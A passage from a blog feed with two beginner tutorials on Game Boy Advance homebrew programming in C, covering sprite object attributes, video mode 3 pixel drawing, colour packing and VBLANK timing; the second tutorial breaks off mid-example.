<p>I’m putting my sprite into [4][1] instead of [4][0] because writing into [4][0] ended up putting some weird artifacts on the top left corner of my screen. I’m not sure why that is yet, and I haven’t found another example of using 8bpp sprites online to see what they’re doing, so I’m going to leave it for now (if you know what’s going on, shoot me a message <a href="https://twitter.com/khalladay">on Twitter</a>).</p>
<p>The last thing we need to get into memory is a description of our sprite (since we need to know how to combine all these tiles we just put into VRAM). To do that, we’re going to define an Object.</p>
<h2 id="gba-objects-arent-objects">GBA Objects Aren’t “Objects”</h2>
<p>As mentioned earlier, a GBA Object is NOT an OOP style Object. Instead, they’re simply a collections of tiles which can be transformed / drawn without needing to clear where they were. If you remember from <a href="http://kylehalladay.com/blog/tutorial/2017/03/28/GBA-By-Example-1.html">last week</a>, we had to do all our own clearing. Objects relieve us of that duty.</p>
<p>Unfortunately, creating an Object is a bit of an arcane exercise, so bear with me here. The first thing we need to do is to define the Object data structure, and where object memory lives:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="k">struct</span> <span class="n">ObjectAttributes</span> <span class="p">{</span>
<span class="n">uint16</span> <span class="n">attr0</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr1</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr2</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">pad</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">packed</span><span class="p">,</span> <span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span> <span class="n">ObjectAttributes</span><span class="p">;</span>
<span class="cp">#define MEM_OAM ((volatile ObjectAttributes *)0x07000000)</span></code></pre></figure>
<p>As you may have guessed from above, you don’t technically store objects in memory (although you’re free to call your struct whatever you want), instead we store what’s referred to as “Object Attributes.” These structs are stored in “Object Attribute Memory”, or OAM.</p>
<p>There’s a lot of information packed into the three uint16 variables in the ObjectAttributes struct, and it’s easy to get lost. In the interest of being the “bare minimum” you need to move a sprite around the screen, I’m only going to talk about the bits that we’re going to use today. If you want a more granular look at things, <a href="http://www.coranac.com/tonc/text/regobj.htm">Tonc</a> does an excellent job at explaining what every bit does.</p>
<p>It’s easiest to describe how these variables work in a table, so here’s attr0</p>
<div align="center">
<table style="border:1px solid black; width=600px; padding:2px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>Attr 0</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Shape of Sprite: 00 = Square, 01 = Tall, 10 = Wide</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">D</td>
<td>Colour Mode: 0 = 4bpp, 1 = 8bpp</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">C</td>
<td>Not used today</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">AB</td>
<td>Not used today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">89</td>
<td>Not used today</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">7654 3210</td>
<td>Y Coordinate</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Our sprite is an 8bpp, square sprite. Using this table, if we wanted to define a sprite like that, and place it at a Y coordinate of 50, we could do so like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span></code></pre></figure>
<p>Here’s what we need in Attr1:</p>
<div align="center">
<table style="border:1px solid black; width=600px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854">
<tr class="header">
<th>Attr 1</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Sprite Size (discussed below)</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">DCBA98</td>
<td>Not Used Today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">7654 3210</td>
<td>X coordinate
</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Sprite size is weird on the GBA. A sprite can be a maximum of 64x64, but doesn’t necessarily have to be square, meaning that what size your sprite is depends both on the value in FE or Attribute 1, and on the shape you defined in Attribute 0. They work together like this:</p>
<div align="center">
<table style="border:1px solid black; width=480px;">
<colgroup>
<col width="80px" />
<col width="100px" />
<col width="100px" />
<col width="100px" />
<col width="100px" />
</colgroup>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td></td>
<td style="border:1px solid black;">Size 00 </td>
<td style="border:1px solid black;">Size 01 </td>
<td style="border:1px solid black;">Size 10 </td>
<td style="border:1px solid black;">Size 11 </td>
</tr>
<tr style="border:1px solid black;">
<td style="background-color:#DDDDDD;">Shape 00</td>
<td style="border:1px solid black;">8x8 </td>
<td style="border:1px solid black;">16x16 </td>
<td style="border:1px solid black;">32x23 </td>
<td style="border:1px solid black;">64x64 </td>
</tr>
<tr style="border:1px solid black;">
<td style="background-color:#DDDDDD;">Shape 01</td>
<td style="border:1px solid black;">16x8 </td>
<td style="border:1px solid black;">32x8 </td>
<td style="border:1px solid black;">32x16 </td>
<td style="border:1px solid black;">64x32 </td>
</tr>
<tr style="border:1px solid black;">
<td style="background-color:#DDDDDD;">Shape 10</td>
<td style="border:1px solid black;">8x16 </td>
<td style="border:1px solid black;">8x32 </td>
<td style="border:1px solid black;">16x32 </td>
<td style="border:1px solid black;">32x64 </td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>It certainly has some logical consistency to it, but I still find it really cumbersome to figure out what I need. In any case, given that we defined a square sprite in attribute 0, if we wanted to define a 16x16 sprite (and we do), at an x coordinate of 100, it would look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span> <span class="c1">// 8bpp tiles, SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4064</span><span class="p">;</span></code></pre></figure>
<p>The last attribute we need to define is maybe the most important, since it tells the hardware where to look for the tiles in VRAM:</p>
<div align="center">
<table style="border:1px solid black; width=600px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854">
<tr class="header">
<th>Attr 2</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FEDC</td>
<td style="border:1px solid black;">Not Used Today</td>
</tr>
<tr style="border:1px solid black;">
<td>BA</td>
<td style="border:1px solid black;">Not Used Today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>98 7654 3210</td>
<td style="border:1px solid black;">First Tile Index</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>It’s worth noting that some of these tables are different when you’re working in 4bpp mode. Eventually I’ll end up using all the options available for sprite drawing, but today I just want to move a thing across my screen.</p>
<p>Combining everything we just talked about: defining our 16x16, 8bpp sprite, at location 100,50, and starting with the tile at index [4][1] looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span> <span class="c1">// 8bpp tiles, SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4064</span><span class="p">;</span> <span class="c1">// 16x16 size when using the SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// Start at [4][1]</span></code></pre></figure>
<p>You’ll notice that the index we pass to attr2 isn’t 1, which is what you’d expect to see passed there since we’re at element 1 of the array. However, the index stored in attr2 assumes that you’re using 4bpp sprites. If you’re using 8bpp like us, you need to go up by 2 indices every time you want to access the next tile.</p>
<p>With that set up, we actually have (almost) everything we need to draw our sprite, we just need to set a few more flags on our DisplayControl variable:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span></code></pre></figure>
<p>As the names suggest, these flags tell the hardware to enable support for objects, and to expect tile memory to be stored as a 1D array. I’ve already covered all the info needed to understand what these mean, so hopefully they make sense now. If you’re confused about the 1D array flag, know that the only other option for tile mapping is in a 2D array, but in the interest of brevity (and imo, coding sanity), I’ve omitted that from this article. As usual, <a href="http://www.coranac.com/tonc/text/regobj.htm">Tonc</a> covers it very well if you’re interested in knowing more.</p>
<h2 id="putting-it-all-together">Putting It All Together</h2>
<p>All that’s left is to put together what we already have. Aside from the sprite include files I added earlier, all the code we need to move a sprite across the screen can easily fit below:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "sprite.h"
#include <string.h>
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint32</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
</span>
<span class="cp">#define REG_VCOUNT (*(volatile uint16*) 0x04000006)
#define REG_DISPLAYCONTROL (*(volatile uint16*) 0x04000000)
</span>
<span class="cp">#define MEM_VRAM ((volatile uint16*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000 )
#define MEM_PALETTE ((uint16*)(0x05000200))
#define SCREEN_W 240
#define SCREEN_H 160
</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">ObjectAttributes</span> <span class="p">{</span>
<span class="n">uint16</span> <span class="n">attr0</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr1</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr2</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">pad</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">packed</span><span class="p">,</span> <span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span> <span class="n">ObjectAttributes</span><span class="p">;</span>
<span class="cp">#define MEM_OAM ((volatile ObjectAttributes *)0x07000000)
</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">vsync</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o">>=</span> <span class="mi">160</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o"><</span> <span class="mi">160</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">spritePal</span><span class="p">,</span> <span class="n">spritePalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">spriteTiles</span><span class="p">,</span> <span class="n">spriteTilesLen</span><span class="p">);</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span> <span class="c1">// 8bpp tiles, SQUARE shape, at y coord 50</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4064</span><span class="p">;</span> <span class="c1">// 16x16 size when using the SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// Start at the first tile in tile</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="n">SCREEN_W</span><span class="p">);</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4000</span> <span class="o">|</span> <span class="p">(</span><span class="mh">0x1FF</span> <span class="o">&</span> <span class="n">x</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Voila! You are now in posession of your very own moving sprite. Notice that unlike last week, we don’t have to do any work to clear the screen (thanks objects!), and all it takes to move the sprite is to update the appropriate attribute.</p>
<p>Finally, I promised to link you to the tools that I used to generate the sprites, both of which were written by the author of the <a href="http://www.coranac.com/projects/tonc/">Tonc tutorial</a>. For bitmap editing (and bitmap palette editing), I used <a href="http://www.coranac.com/projects/usenti/">Usenti</a>, and for exporting that bitmap to the .c code we looked at, I used <a href="http://www.coranac.com/projects/grit/">Grit</a>. Both tools are very straightforward, but definitely don’t overlook Grit’s GUI client (helpfully called “WinGrit”), it makes life much easier.</p>
<p>That’s it for today! Hope you had as much fun as I did! As always, if you want to say hi, I’m most accessible <a href="https://twitter.com/khalladay">on Twitter</a>, Have a good one!</p>
GBA By Example - Drawing and Moving Rectangles2017-03-28T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/03/28/GBA-By-Example-1<p>The idea of making something for GameBoy has always appealed to me. Not only was it my platform of choice when I was a little kid, but naively, it has always looked like the relaxing combination of hardware simple enough to really understand, an OS (or BIOS) that gets out of your way (no firmware updates), and a platform that’s open enough to not need to deal with jailbreaking the device, and the GBA could do 3D!</p>
<p>I’ve had a <a href="http://krikzz.com/store/home/42-everdrive-gba-x5.html">Kirkzz Everdrive</a> sitting around for a few months that I’ve meant to play with, and I finally had some time during my vacation lask week to try it out. Behold the fruits of my labors:</p>
<div align="center">
<img src="/images/post_images/2017-03-31/snake.gif" style="width:240px;height:160px" />
<font size="2">(I on the other hand, cannot make the GBA do 3D yet)</font><br /><br />
</div>
<p>So, it isn’t exactly impressive, but it was a lot of fun, and I definitely want to play around with the GBA some more.</p>
<p>One of the great things about being late to the dev scene for a console is that lots of people have come before you and written great material, especially <a href="http://problemkaputt.de/gbatek.htm">GBATek</a> and the <a href="http://www.coranac.com/tonc/text/">Tonc Tutorials</a>. But what I really wish existed was a GBA version of the excellent <a href="http://metalbyexample.com/">Metal By Example</a>, which does an amazing job at easing into the nuts and bolts of the Metal API, by presenting each step as a small, buildable example.</p>
<p>Since that doesn’t exist for the GBA yet, I’m here to make that happen. To that end: this article is going to focus on the absolute minimum you need to know to draw and move rectangles around the screen on the GBA. You can do a lot with just that, and it feels great to see something moving on screen, so let’s get started!</p>
<h2 id="setting-up-your-dev-environment">Setting Up Your Dev Environment</h2>
<p>First thing first, we’re going to need a way to run our project. As mentioned, I have an Everdrive GBA cart so I could put my stuff on actual hardware, but that’s completely overkill for this tutorial (and to be honest, most of the time it was faster to work in emulator anyway). I downloaded <a href="https://sourceforge.net/projects/vba/">VisualBoyAdvance</a> to work with, which is a great open source emulator, but there are lots out there to choose from, and any of them should be able to do what we need them to do.</p>
<p>Secondly, we’re going to need a way to build our projects. There are fewer options here, and the one that I found the best was <a href="https://devkitpro.org/">DevKitPro</a>. This has tools for lots of platforms, but make sure you enable the GBA and ARM components when you’re installing. Once you have that installed, it’s time to set up your project. The easiest thing for my was to copy one of the makefiles from the devkitpro examples folder and simply change the name of the “sources” folder to the one that I was using for my build:</p>
<div align="center">
<img src="/images/post_images/2017-03-31/make.PNG" /><br />
</div>
<p>I placed that make file in the same directory as the folder which held my code (which was the root dir of my project). With that, all it took was a simple call to make to get a fully working GBA game!</p>
<p>If you’re dubious about this working, <a href="https://gist.github.com/khalladay/7c86f092a48342adf6d35aa2861b3ed3">this gist</a> has a minimal gba example which will clear the screen red. Try putting that in your source directory and running make, and then opening the result in your emulator of choice. If you see a red screen, everything is working as intended.</p>
<h2 id="setting-a-video-mode">Setting a Video Mode</h2>
<p>Ok, so now we know our build process works, it’s time to dig into the nuts and bolts of building something for gameboy!</p>
<p>The first thing we need to do is pick a video mode to use. The GBA has five different modes that control how you draw to the screen. Eventually, I’m sure it will be good to know how to use each one of these modes, but mode 3 seemed like the easiest to use, so that’s where I started. What this means is that our screen buffer is going to be a 240 x 160, 16 bit buffer. It’s also going to be single-buffered, so if we want to change the pixel at (50,50) on the screen, all we need to do is go to that point in video memory and change the value there.</p>
<p>Now here’s where things started feeling weird to me: in order to set the gameboy to video mode 3, we need to set a display control byte to the correct value. I expected that this meant there’d be a function to call, but there isn’t. What we need to do is go to memory address 0x04000000, and set the correct video mode flag there. It turns out that GBA dev is full of this paradigm - the hardware is simple enough that a lot of things can be controlled by a specific bit or byte being said, and rather than expose this via a system call, you just set the value directly at the appropriate address. Ahh, the wonders of old school tech.</p>
<p>Predictably, to set the hardware to video mode 3, we need to set the display control register (0x04000000) to a value of 3 (more specifically 0x0003). We also need to set a background mode. This is important for other video modes, but since we’re using mode 3, all we need to know is that our background mode needs to be set to mode 2 in order for anything to show up.</p>
<p>We can set these values like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3 0x0003
#define BGMODE_2 0x0400
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_3</span> <span class="o">|</span> <span class="n">BGMODE_2</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">){}</span>
<span class="p">}</span></code></pre></figure>
<p>A lot of tutorials use more concise constant names, and while they may be more standard (like REG_DISPCNT), I found it much easier to use more descriptive names. Additionally, you may be wondering why our pointer to the REG_DISPLAYCONTROL address needs to be marked “volatile,” this is an instruction to the compiler to tell it that even though nothing in our code is reading from this address, we don’t want the compiler to optimize away the logic that sets it’s value (since the hardware is going to look at this address).</p>
<p>You probably also noticed that I defined my own convenience type for unsigned ints. Since we’re going to do a lot of writing values directly to memory addresses, the size of our integers matters a lot, and typing “unsigned int” out all the time will drive you mad.</p>
<p>Lastly, you definitely noticed that the program immediately enters an infinite while loop. We really, really, don’t want to have our main function exit, since that would mean the gameboy game would exit, and what that means is undefined. So instead of a traditional game loop with a flag to control when to exit, game loops on GBA will always be infinite.</p>
<p>If you run this, it will (unsurprisingly) do nothing, so maybe we should tell it to do something?</p>
<h2 id="drawing-to-the-screen">Drawing To The Screen</h2>
<p>Like I mentioned before, in mode 3, we don’t need to worry about managing multiple color buffers, or working with tile maps, or anything else. All we need to do is set the pixels in video memory to what we want. This is virtually identical to what we had to do previously to set the video mode, except that the screen buffer starts at memory address 0x06000000:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3 0x0003
#define BGMODE_2 0x0400
</span>
<span class="cp">#define SCREENBUFFER ((volatile uint16*)0x06000000)
#define SCREEN_W 240
#define SCREEN_H 160
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_3</span> <span class="o">|</span> <span class="n">BGMODE_2</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">SCREEN_W</span> <span class="o">*</span> <span class="n">SCREEN_H</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SCREENBUFFER</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xFFFF</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">){}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span> </code></pre></figure>
<p>Running this now will get you a nice white screen. Progress! Note that we don’t dereference the pointer to the screen buffer in the macro, because we want to index into the screen buffer array to set pixels that aren’t the top left corner of the screen (on GBA, the Y axis increases as it gets lower on screen), and to do that, we need a pointer to the beginning of the array.</p>
<p>The only sorta weird thing about this is how the GBA stores colours. Earlier I said that Mode 3 meant our screen was 16 bit color, but that’s not really true. The GBA actually uses 15 bit color, leaving the first bit alone. In the above example, we didn’t need to know this, because we were just setting things to pure white, but assuming you’ll want to write a colour that isn’t black or white, the following function comes in handy:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint8</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="n">green</span> <span class="o"><<</span> <span class="mi">5</span> <span class="o">|</span> <span class="n">blue</span> <span class="o"><<</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>To give credit where it’s due, the above function comes from the <a href="http://www.coranac.com/tonc/text/">Tonc tutorial</a> As you may have guessed from the above, colours on the GBA are stored as 16 bit integers, with the data laid out like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">[</span><span class="n">unused</span> <span class="n">bit</span><span class="p">]</span> <span class="n">BBB</span> <span class="n">BBGG</span> <span class="n">GGGR</span> <span class="n">RRRR</span></code></pre></figure>
<p>Note that each colour getting only 5 bits means that channels can only store 1 of 32 values (0 - 31), so passing a number outside this range to the function is essentially useless. I’ve seen some other tutorials recommend AND-ing the passed in channel values with 0x1F to clamp them to a 5 bit value, but I feel like ensuring the inputs to your functions are correct is a problem for an assert in a debug build and not runtime cycles. That being said, how to debug a GBA game is beyond the scope of what I want to talk about today (and to be honest, outside the scope of what I know how to do right now), so maybe AND-ing isn’t such a bad idea:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint8</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">red</span> <span class="o">&</span> <span class="mh">0x1F</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span> <span class="o">&</span> <span class="mh">0x1F</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">5</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span> <span class="o">&</span> <span class="mh">0x1F</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>You can use the above function to make any colour your screen is capable of displaying, but right now all we have is the logic to clear the screen to a colour. Let’s do something a bit more interesting and write the (hopefully) extremely simple function for drawing differently sized rectangles:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">drawRect</span><span class="p">(</span><span class="kt">int</span> <span class="n">left</span><span class="p">,</span> <span class="kt">int</span> <span class="n">top</span><span class="p">,</span> <span class="kt">int</span> <span class="n">width</span><span class="p">,</span> <span class="kt">int</span> <span class="n">height</span><span class="p">,</span> <span class="n">uint16</span> <span class="n">clr</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="n">height</span><span class="p">;</span> <span class="o">++</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="n">width</span><span class="p">;</span> <span class="o">++</span><span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SCREENBUFFER</span><span class="p">[(</span><span class="n">top</span> <span class="o">+</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">SCREEN_W</span> <span class="o">+</span> <span class="n">left</span> <span class="o">+</span> <span class="n">x</span><span class="p">]</span> <span class="o">=</span> <span class="n">clr</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>That’s much more useful! Now we can make vertical and horizontal lines, and rectangles of all shapes and sizes. You can even divide up the screen into 8x8 blocks and set each one to something different if you feel like it!</p>
<div align="center">
<img src="/images/post_images/2017-03-31/screenfill.png" />
<font size="2">(I did)</font><br /><br />
</div>
<p>But this is only useful if you want to make static images appear on your screen, and the title of this post also promised that our rectangles would move, so it’s time to move inside our infinite game loop and do some work there.</p>
<h2 id="the-gba-drawing-process">The GBA Drawing Process</h2>
<p>Before we get to the fun stuff though, I need to talk briefly about how the GBA takes the data in the SCREENBUFFER array draws it on the screen.</p>
<p>The GBA draws each row of the screen sequentially, and serially (one after the other). Updating a pixel on the screen takes the hardware 4 cycles, which means that updating a single row of the screen takes 4 * 160 cycles. At the end of each row, the hardware pauses briefly. This pause is known as the Horizontal Blank, or HBLANK, and takes as long as it would take the hardware to update another 68 pixels (272 cycles).</p>
<p>This process continues for each row on the screen. Once all the rows have been updated, there is a larger pause called the Vertical Blank, or VBLANK. This pause lasts as long as it would take the hardware to update 68 more rows of pixels (including the HBLANK time). This works out to 4 * (240 + 68) * 68, or 83776 cycles. These numbers will be very important in more complex project, but are included here just because I thought it was good info to know.</p>
<p>This drawing process is going to occur no matter what our code is doing, without us having to tell the hardware to do it, which means that any code which modifies the data in the SCREENBUFFER array, should do so in the VBLANK pause. Otherwise, we could update the screen halfway through it being drawn, which would lead to tearing artifacts where part of the screen is displaying 1 frame behind other parts.</p>
<p>This means that we need to be able to detect when we’re in VBLANK! There’s two ways to do this, the proper way and the easy way. For my first attempt at GBA dev, I chose the easy way:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_VCOUNT (* (volatile uint16*) 0x04000006)
